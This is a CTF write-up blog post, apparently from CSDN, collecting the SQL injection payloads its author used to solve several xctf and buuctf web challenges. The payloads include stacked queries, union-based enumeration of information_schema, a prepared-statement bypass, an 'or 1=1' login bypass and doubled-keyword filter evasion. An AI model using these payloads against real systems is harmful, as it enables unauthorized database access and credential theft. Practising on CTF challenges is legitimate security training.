CTF做题笔记5

已于 2022-01-27 15:26:31 修改
阅读量3.3k 收藏
点赞数 1
分类专栏: 笔记 文章标签: 数据库 web安全 安全
于 2022-01-27 15:22:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forever_Han13/article/details/122718440
版权

xctf-supersqli:

?inject=-1';show databases;--+
?inject=-1';show tables;--+
?inject=-1';show columns from `1919810931114514`;--+
?inject=-1';set @a= concat('sel','ect * from `1919810931114514`');prEpare stmt from @a;EXECUTE stmt;--+

xctf-NewsCenter:

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- #
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table' -- #
1' union select 1,group_concat(fl4g) ,3 from secret_table#

buuctf-[极客大挑战 2019]EasySQL

' or 1=1#

buuctf-[SUCTF 2019]EasySQL:

*,1

buuctf-[极客大挑战 2019]LoveSQL1:

check.php?username=1' union select 1,2,3%23&password=3343e366b3bf223d3b5e148db0426a19

check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

check.php?username=1' union select 1,(select group_concat(concat_ws('-',id,username,password)) from l0ve1ysq1),3%23&password=1

buuctf-[极客大挑战 2019]BabySQL1:

check.php?username=-1'+ununionion+selselectect+1,2,database()%23&password=1

check.php?username=-1'+ununionion+selselectect+1,(selselectect group_concat(schema_name) frofromm infoorrmation_schema.schemata),3%23&password=1z

check.php?username=-1'+ununionion+selselectect+1,(selselectect group_concat(schema_name) frofromm infoorrmation_schema.schemata),3%23&password=1z

check.php?username=-1'+ununionion+selselectect+1,2,group_concat(table_name) frofromm infoorrmation_schema.tables whewherere table_schema='ctf'%23&password=1z

check.php?username=-1'+ununionion+selselectect+1,2,group_concat(column_name) frofromm infoorrmation_schema.columns whewherere table_name='Flag'%23&password=1z

check.php?username=-1'+ununionion+selselectect+1,2,group_concat(flag) frofromm ctf.Flag%23&password=1z
N1etzsche
关注
专栏目录
CTF做题笔记13
Forever_Han13的博客
05-01 310
CISCN2019 华北赛区 Day1 Web1 Dropbox <!--phar--> <?php class User { public $db; } class File{ public $filename; } class FileList{ private $files; public function __construct($path) { $file = new File(); $file-&gt
CTF做题笔记4
Forever_Han13的博客
12-11 2838
题:ics-06 题目:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 解答:启动场景,获得信息 发现只有左侧报表中心可以点击,看见地址中含有id=1,可以尝试用爆破 用crunch工具生成字典 crunch 1 5 0123456789 >> pass_4.txt 查看字典 more pass_1.txt 运用BurpSuite加载字典进行爆破,发现id=2333响应长度不一样 获得flag [外链图片转存失败,源站可能有防盗
我的CTF学习与教学之旅笔记5
lm19770429的专栏
04-07 210
sql注入之get
buuctf(探险2)
qq_62046696的博客
08-08 919
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
CTF---Web---SQL注入---06---tables关键字替换
qq_22160557的博客
07-31 592
文章目录前言一、题目描述二、解题步骤1.2.3.三、总结 前言 题目分类: CTFWeb—SQL注入—0 一、题目描述 题目:新闻搜索 二、解题步骤 1. 2. 3. 三、总结 1、 参考链接:
CTF 总结03:SQL注入
weixin_42789937的博客
02-25 481
CTF 总结03:SQL注入,在此整理一篇答题合集,适合与我一样对与SQL知道那么一点点,但是又不怎么熟悉流程的小白~
php入侵检查,PHP的信息安全(入侵获取$flag)的题目【Q2】
weixin_32364911的博客
03-13 323
地址:http://202.120.7.134:8888/html/array.php参加ISG(信息安全大赛)发现的一道题目。作为一名PHPer,喵的我真心感觉这代码无解啊。。。求大神解惑,如何给一个user参数,获取到$flag。。。Update at 2015/20/22总算通过”邀请回答”找到大神了~漏洞在于PHP的数组下标的一个BUG,可以利用【整型溢出】……可以参照这里:https:/...
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
CTF简单笔记
bmovo的博客
10-06 1726
CTF简单笔记: 远程开启kali桌面命令:sudo /etc/init.d/xrdp start CTF:①Misc:杂项 ②Crypto:密码安全Web安全 ④Reverse:逆向工程 ⑤Pwn #杂项: 1、文件操作与隐写 2、图片隐写术 3、压缩文件处理 4、流量取证技术 1、文件操作与隐写 #命令就是一个对应的工具,只是这个工具没有对应的图形化界面而已 (1)、Fi...
最新CTF内网渗透笔记_ctf api
2401_84281720的博客
05-02 45
6.扫描特定的端口。
CTF做题笔记
qq_74303907的博客
01-17 675
3.解法1:可以使用0e开头的数字进行传递参数,因为php将0e开头的数字转化为0,故此时MD5值相等,而两个变量值不相等。首先发现smarty模板,构造'{}'/'{'上传,如果报错,则smarty模板注入。构造data={if system('ls /')}{/if} *显示数据库目录。构造data={if system('cat /目录名')}{/if}使用'{}'表示一个JSON对象,键和值之间使用冒号:分隔。在调试器中打开js脚本,寻找重要函数,修改在控制器中。文件上传绕过: 1.大小写绕过。
ctf-misc 个人笔记(有空闲更新)
2401_84281712的博客
05-16 356
如果两者都是偶数,那早就直接打开了;(二维码就不放了)可以得到第一个清晰的图片是有5625个像素点,第二张是有625个,说明第一张的图片像素点九个就组成一个,说明第一张图片长宽是第二张的三倍(属性中也可以看出来)第一种方法是根据大佬的思路,把第一个图片以间隔为3读取像素点,第二个图片直接读取像素点,分别转换成2进制,这样两个图片的数据就一样长, 可以全部异或,最后再把得到的数据转成二维码放大三倍就能出真正的二维码,直接扫出flag。也有可能是摩斯电码,将波形图缩小,可以看到明显的一长一短和间隔,可以手记。
CTF解题笔记(1)
热门推荐
CODING...
01-09 1万+
因缺思汀的绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
一天一道CTF 第三天(堆叠注入改表名)
scrawman的博客
03-02 441
[强网杯 2019]随便注 今天的也是SQL注入,输入1'报错显示说明闭合符号是' 再随便试试-1’ union select 1,2,3 --+,回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); preg_match本来的作用是一个匹配函数,也就是在我们输入的语句中查找是否存在select等关键词,i表示大小写不敏感,无法用大小写混搭来绕过。 在网上查了一下可以用堆叠注入,1';show databa
CTF解题笔记(2)
CODING...
01-09 5823
CTF检测过滤绕过笔记
实用SQL小总结
UntifA的博客
09-29 1450
SQL记录
Ubuntu有关redis的命令
最新发布
weixin_53717695的博客
10-06 180
Ubuntu有关redis的命令
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1271
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 601
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
ctf garden解题
04-30
CTF Garden是一个在线的CTF(Capture The Flag)平台,提供了各种类型的解题挑战,旨在帮助安全爱好者提升技能和知识。在CTF Garden中,你可以通过解决各种不同难度的题目来学习和实践网络安全相关的技术。 解题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值